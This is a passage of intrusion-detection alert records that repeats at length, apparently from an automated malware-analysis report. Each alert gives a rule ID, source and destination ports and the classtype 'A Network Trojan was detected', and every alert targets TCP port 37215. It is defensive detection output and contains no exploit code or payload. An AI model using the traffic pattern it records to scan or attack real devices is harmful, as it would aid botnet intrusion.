              SID:2829579
              Source Port:34834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282859
              SID:2829579
              Source Port:33076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045055
              SID:2835222
              Source Port:36274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623732
              SID:2835222
              Source Port:44380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102914
              SID:2829579
              Source Port:38296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186571
              SID:2835222
              Source Port:44236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538251
              SID:2835222
              Source Port:55800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551297
              SID:2835222
              Source Port:50126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235547
              SID:2835222
              Source Port:56564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570479
              SID:2835222
              Source Port:48194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.241920
              SID:2835222
              Source Port:53340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.194384
              SID:2829579
              Source Port:55012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343676
              SID:2829579
              Source Port:60974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102874
              SID:2829579
              Source Port:55854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662571
              SID:2829579
              Source Port:35964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570480
              SID:2835222
              Source Port:55010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878261
              SID:2835222
              Source Port:44648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341093
              SID:2835222
              Source Port:59718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859816
              SID:2829579
              Source Port:40832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099695
              SID:2835222
              Source Port:47374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516294
              SID:2835222
              Source Port:35220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.109405
              SID:2829579
              Source Port:37648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.603690
              SID:2829579
              Source Port:43396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517465
              SID:2829579
              Source Port:44922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.064529
              SID:2829579
              Source Port:43362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204838
              SID:2829579
              Source Port:51088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.766249
              SID:2835222
              Source Port:48376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516265
              SID:2829579
              Source Port:59132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624445
              SID:2829579
              Source Port:54396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857828
              SID:2835222
              Source Port:58726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300063
              SID:2835222
              Source Port:44302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858954
              SID:2829579
              Source Port:49242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856974
              SID:2829579
              Source Port:52884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574565
              SID:2829579
              Source Port:42728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581798
              SID:2835222
              Source Port:37502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113478
              SID:2835222
              Source Port:45836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.976571
              SID:2835222
              Source Port:43358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100718
              SID:2829579
              Source Port:37904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801925
              SID:2829579
              Source Port:49568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574109
              SID:2835222
              Source Port:43386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536577
              SID:2829579
              Source Port:56024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187951
              SID:2829579
              Source Port:56548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.390674
              SID:2835222
              Source Port:50886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504668
              SID:2829579
              Source Port:53882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663715
              SID:2835222
              Source Port:52976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725727
              SID:2835222
              Source Port:44356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.302982
              SID:2835222
              Source Port:49642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.757428
              SID:2829579
              Source Port:55238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542137
              SID:2829579
              Source Port:50090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481392
              SID:2829579
              Source Port:39776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574830
              SID:2835222
              Source Port:33542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278427
              SID:2829579
              Source Port:50080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234671
              SID:2835222
              Source Port:42006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681366
              SID:2835222
              Source Port:54816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.835210
              SID:2835222
              Source Port:58426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536716
              SID:2829579
              Source Port:53236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062703
              SID:2829579
              Source Port:57564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.602568
              SID:2829579
              Source Port:46370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663652
              SID:2829579
              Source Port:48314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.531860
              SID:2829579
              Source Port:34476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430651
              SID:2829579
              Source Port:47872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.442867
              SID:2835222
              Source Port:59542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544288
              SID:2829579
              Source Port:56796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.123981
              SID:2829579
              Source Port:44296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692248
              SID:2835222
              Source Port:48994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458999
              SID:2829579
              Source Port:41862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205998
              SID:2829579
              Source Port:37230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503354
              SID:2835222
              Source Port:34306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638747
              SID:2829579
              Source Port:53148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204691
              SID:2835222
              Source Port:36880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.391620
              SID:2835222
              Source Port:40576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485994
              SID:2835222
              Source Port:51688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.489491
              SID:2835222
              Source Port:54512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858398
              SID:2829579
              Source Port:49866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300263
              SID:2829579
              Source Port:43790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.309229
              SID:2835222
              Source Port:53364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575171
              SID:2835222
              Source Port:55188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.749098
              SID:2829579
              Source Port:60398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.444714
              SID:2835222
              Source Port:36232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334197
              SID:2835222
              Source Port:47134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101049
              SID:2835222
              Source Port:52012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449293
              SID:2835222
              Source Port:51216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763876
              SID:2835222
              Source Port:52574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624481
              SID:2835222
              Source Port:33176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186422
              SID:2835222
              Source Port:39652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486461
              SID:2829579
              Source Port:40952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053108
              SID:2829579
              Source Port:51048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860117
              SID:2835222
              Source Port:35842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049621
              SID:2829579
              Source Port:50934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.543483
              SID:2829579
              Source Port:37050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859011
              SID:2835222
              Source Port:57230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661950
              SID:2829579
              Source Port:57560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478315
              SID:2835222
              Source Port:56810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695709
              SID:2835222
              Source Port:41744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.430409
              SID:2835222
              Source Port:34104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061765
              SID:2835222
              Source Port:51238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.804826
              SID:2829579
              Source Port:34174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115202
              SID:2835222
              Source Port:50102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.391347
              SID:2829579
              Source Port:58158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490433
              SID:2829579
              Source Port:39872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.886915
              SID:2835222
              Source Port:46294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278078
              SID:2829579
              Source Port:34420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100547
              SID:2835222
              Source Port:58128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857793
              SID:2829579
              Source Port:47702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.925975
              SID:2835222
              Source Port:50784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.117122
              SID:2835222
              Source Port:53462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517266
              SID:2835222
              Source Port:52946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341076
              SID:2829579
              Source Port:55110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456202
              SID:2829579
              Source Port:47250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245778
              SID:2829579
              Source Port:44004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.600175
              SID:2829579
              Source Port:37576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638380
              SID:2835222
              Source Port:55850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797815
              SID:2835222
              Source Port:57464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458308
              SID:2835222
              Source Port:46004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341195
              SID:2829579
              Source Port:49826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368981
              SID:2835222
              Source Port:39134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631322
              SID:2835222
              Source Port:51974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503791
              SID:2835222
              Source Port:35274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115153
              SID:2829579
              Source Port:40616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493534
              SID:2829579
              Source Port:60932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576481
              SID:2829579
              Source Port:36250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.113744
              SID:2829579
              Source Port:42472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458421
              SID:2835222
              Source Port:46190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920825
              SID:2835222
              Source Port:51556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313297
              SID:2835222
              Source Port:50708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870669
              SID:2835222
              Source Port:48044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549205
              SID:2829579
              Source Port:40420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420429
              SID:2835222
              Source Port:47032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.346861
              SID:2835222
              Source Port:38294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254136
              SID:2829579
              Source Port:34896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329359
              SID:2829579
              Source Port:43530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.544194
              SID:2835222
              Source Port:52646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.629374
              SID:2829579
              Source Port:39896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340623
              SID:2835222
              Source Port:53676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445833
              SID:2835222
              Source Port:49500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.759737
              SID:2835222
              Source Port:44290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549685
              SID:2829579
              Source Port:39742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.804697
              SID:2829579
              Source Port:39442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.374039
              SID:2829579
              Source Port:45606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.241991
              SID:2829579
              Source Port:52730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.070059
              SID:2835222
              Source Port:50766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483462
              SID:2835222
              Source Port:33428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.155739
              SID:2835222
              Source Port:54060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478221
              SID:2829579
              Source Port:40166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.285047
              SID:2835222
              Source Port:49738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802680
              SID:2829579
              Source Port:52610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341166
              SID:2829579
              Source Port:36358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763985
              SID:2835222
              Source Port:53606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484482
              SID:2835222
              Source Port:32812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.480517
              SID:2829579
              Source Port:56518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.766398
              SID:2835222
              Source Port:56242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692509
              SID:2835222
              Source Port:43734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.804745
              SID:2829579
              Source Port:54332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.756467
              SID:2835222
              Source Port:58988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.982398
              SID:2835222
              Source Port:53876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189536
              SID:2829579
              Source Port:48758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044853
              SID:2835222
              Source Port:54926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.117252
              SID:2835222
              Source Port:60526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727072
              SID:2835222
              Source Port:53350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.774422
              SID:2835222
              Source Port:44864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631214
              SID:2835222
              Source Port:46356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447184
              SID:2829579
              Source Port:40384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799356
              SID:2835222
              Source Port:41434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450175
              SID:2829579
              Source Port:56930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664521
              SID:2835222
              Source Port:37942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926931
              SID:2829579
              Source Port:44392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421693
              SID:2835222
              Source Port:60280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.065646
              SID:2829579
              Source Port:41046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.871930
              SID:2829579
              Source Port:39216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332198
              SID:2829579
              Source Port:60462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.660863
              SID:2835222
              Source Port:42606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494386
              SID:2835222
              Source Port:44398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128765
              SID:2835222
              Source Port:42688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361273
              SID:2835222
              Source Port:46010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625586
              SID:2829579
              Source Port:44154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625654
              SID:2835222
              Source Port:42478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102298
              SID:2835222
              Source Port:57698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519179
              SID:2829579
              Source Port:52256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111927
              SID:2829579
              Source Port:38008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536820
              SID:2829579
              Source Port:47380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.071028
              SID:2829579
              Source Port:43668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.591870
              SID:2829579
              Source Port:58690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.992178
              SID:2829579
              Source Port:36348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478279
              SID:2835222
              Source Port:50964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662549
              SID:2835222
              Source Port:46724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102159
              SID:2835222
              Source Port:57280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116596
              SID:2829579
              Source Port:59800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396670
              SID:2835222
              Source Port:42220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341195
              SID:2829579
              Source Port:36172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538387
              SID:2829579
              Source Port:41772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055726
              SID:2835222
              Source Port:41510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347596
              SID:2835222
              Source Port:33182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.766297
              SID:2829579
              Source Port:46332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.454547
              SID:2829579
              Source Port:49622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157088
              SID:2835222
              Source Port:40430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.444042
              SID:2829579
              Source Port:47140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055510
              SID:2829579
              Source Port:39502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550524
              SID:2829579
              Source Port:40486
              Destination Port:37215
